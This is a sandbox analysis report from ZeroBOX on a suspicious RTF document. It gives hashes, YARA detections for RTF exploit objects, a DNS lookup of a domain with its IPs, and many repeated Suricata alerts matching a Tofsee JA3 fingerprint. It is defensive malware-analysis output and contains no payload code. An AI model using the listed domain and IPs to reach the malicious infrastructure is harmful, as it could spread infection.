popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

lionsarekingogthejunglewhorulestheentireforestandlionsgreattounderstandtheyaregreattoundersetandlionsarekindofthejungle__lionsarekingofjungle.doc

MS_RTF_Obfuscation_Objects doc RTF File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 7, 2024, 9:35 a.m. June 7, 2024, 9:49 a.m.
Size 35.2KB
Type ISO-8859 text, with very long lines, with CRLF, CR, LF line terminators
MD5 56b4ddf6c247124f9bc633b06b169a84
SHA256 67ad0f57895b9963fff217941c49d4eb97023d65fd5b3d36ab936c24fa35a6f0
CRC32 C7F499F1
ssdeep 384:hWpJrekkBQCwF1YiQwB622Kfc51AD1BMulQGcCAnYuw:hWvSQ3F1YiQwMZFsAulQQAw
Yara
  • SUSP_INDICATOR_RTF_MalVer_Objects - Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.
  • MS_RTF_Suspicious_documents - Suspicious documents using RTF document OLE object
  • Rich_Text_Format_Zero - Rich Text Format Signature Zero

Name Response Post-Analysis Lookup
www1.militarydefensenow.com
A 34.192.83.212
34.192.83.212
IP Address Status Action
164.124.101.2 Active Moloch
34.192.83.212 Active Moloch
67.207.166.175 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49173 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49173 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49171 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49168 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49167 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49169 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49181 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49167 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49177 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49167 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49181 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49177 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49177 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49181 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49181 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49172 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49172 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49172 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49185 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49184 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49184 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49185 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49184 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49185 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49185 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49188 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49188 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49188 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49186 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49186 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49175 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49189 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49189 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49187 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49187 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49190 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49175 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49175 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49190 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49189 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49189 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49190 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49190 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49196 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49196 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49176 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49196 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49191 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49191 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49196 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49196 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49191 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49192 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49179 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49191 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49179 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49197 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49179 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49197 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49199 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49199 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49192 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49197 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49192 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49197 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49210 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49210 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49210 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49194 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49194 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49210 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49210 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49194 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49194 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49200 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49214 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49214 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49214 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49200 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49200 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49204 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49214 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49214 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49201 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49201 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49201 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49216 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49217 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49217 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49216 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49217 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49201 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49201 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49217 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49216 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49217 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49216 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49218 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49205 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49218 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49218 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49220 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49220 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49205 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49205 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49220 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49220 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49218 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49218 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49207 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49207 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49207 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49225 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49222 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49225 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49222 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49222 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49225 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49225 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49207 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49222 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49207 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49222 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49235 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49241 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49213 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49241 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49213 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49241 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49213 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49235 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49235 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49213 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49213 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49250 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49250 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49251 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49250 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49219 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49251 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49219 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49251 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49250 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49250 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49219 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49251 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49219 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49251 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49255 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49247 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49253 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49255 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49247 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49253 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49255 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49247 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49253 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49255 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49247 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49255 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49253 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49247 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49253 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49292 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49252 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49292 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49256 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49252 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49256 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49292 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49252 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49256 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49292 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49256 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49292 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49256 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49252 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49252 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49260 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49319 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49260 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49319 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49260 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49319 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
